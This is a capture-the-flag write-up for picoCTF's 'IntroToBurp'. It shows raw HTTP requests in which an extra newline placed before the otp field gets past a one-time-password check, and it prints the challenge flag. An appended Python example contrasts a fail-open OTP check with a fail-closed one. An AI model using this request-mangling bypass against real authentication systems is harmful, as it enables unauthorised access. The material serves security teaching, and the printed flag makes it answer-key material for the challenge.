IntroToBurp
Description
Try here to find the flag
Hints
- Try using burpsuite to intercept request to capture the flag.
- Try mangling the request, maybe their server-side code doesn't handle malformed requests very well.
Solution
I changed this request as follows:
Before:
POST /dashboard HTTP/1.1
Host: titan.picoctf.net:54520
Content-Length: 7
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.6261.112 Safari/537.36
Origin: http://titan.picoctf.net:54520
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://titan.picoctf.net:54520/dashboard
Accept-Encoding: gzip, deflate, br
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8
Cookie: session=.eJxFjEkOwyAUQ-_CuhvIL6S9DGIwStQEEIOiqurdywZ1Zz_L78Pc3t7sybad3ZirJeiWXoiDqNUEYyEClHd3LiUMaIGiB1eWhHALcQevxi_049DRnJii1PKIfCUpaNRsar1S8XPOW4rQsZ8WZbJeUf6K7w8D2i7l.Zf23kw.f0yBpHrXIzI0wjPN2_qVBqpw6_k
Connection: close

otp=123
After:
POST /dashboard HTTP/1.1
Host: titan.picoctf.net:54520
Content-Length: 9
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.6261.112 Safari/537.36
Origin: http://titan.picoctf.net:54520
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://titan.picoctf.net:54520/dashboard
Accept-Encoding: gzip, deflate, br
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8
Cookie: session=.eJxFjEkOwyAUQ-_CuhvIL6S9DGIwStQEEIOiqurdywZ1Zz_L78Pc3t7sybad3ZirJeiWXoiDqNUEYyEClHd3LiUMaIGiB1eWhHALcQevxi_049DRnJii1PKIfCUpaNRsar1S8XPOW4rQsZ8WZbJeUf6K7w8D2i7l.Zf23kw.f0yBpHrXIzI0wjPN2_qVBqpw6_k
Connection: close


otp=123
I simply added an extra newline before the otp parameter and created a malformed request.
flag: picoCTF{p@g3_turn3r_0c0d211f}
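Why the extra newline matters to a form parser, as an added example that is not part of the original writeup or the challenge's code: the two bodies are taken from the requests above, while `EXPECTED_OTP` and both check functions are hypothetical, since the page does not show the server-side logic. It contrasts a check that fails open when the `otp` field is missing with one that fails closed.

```python
import hmac
from urllib.parse import parse_qs

EXPECTED_OTP = "482913"  # constructed value; the page does not reveal the real OTP

# Bodies from the two requests shown above ("Before" and "After").
BEFORE_BODY = b"otp=123"
AFTER_BODY = b"\r\notp=123"  # extra CRLF ahead of the parameter


def parse_form(body: bytes) -> dict:
    """Parse an application/x-www-form-urlencoded body into {name: first value}."""
    pairs = parse_qs(body.decode("latin-1"), keep_blank_values=True)
    return {name: values[0] for name, values in pairs.items()}


def check_otp_fail_open(body: bytes) -> bool:
    """Hypothetical flawed check: rejects only when 'otp' is present and wrong."""
    otp = parse_form(body).get("otp")
    if otp is not None and otp != EXPECTED_OTP:
        return False
    return True  # a missing 'otp' field falls through to success


def check_otp_fail_closed(body: bytes) -> bool:
    """Hardened check: the exact field must exist and match, otherwise deny."""
    otp = parse_form(body).get("otp")
    if otp is None:
        return False
    return hmac.compare_digest(otp.encode(), EXPECTED_OTP.encode())


if __name__ == "__main__":
    for label, body in (("before", BEFORE_BODY), ("after", AFTER_BODY)):
        print(label, len(body), parse_form(body),
              check_otp_fail_open(body), check_otp_fail_closed(body))
```

The body lengths match the `Content-Length` values of 7 and 9 in the two requests, and the malformed body yields a field named `\r\notp` rather than `otp`.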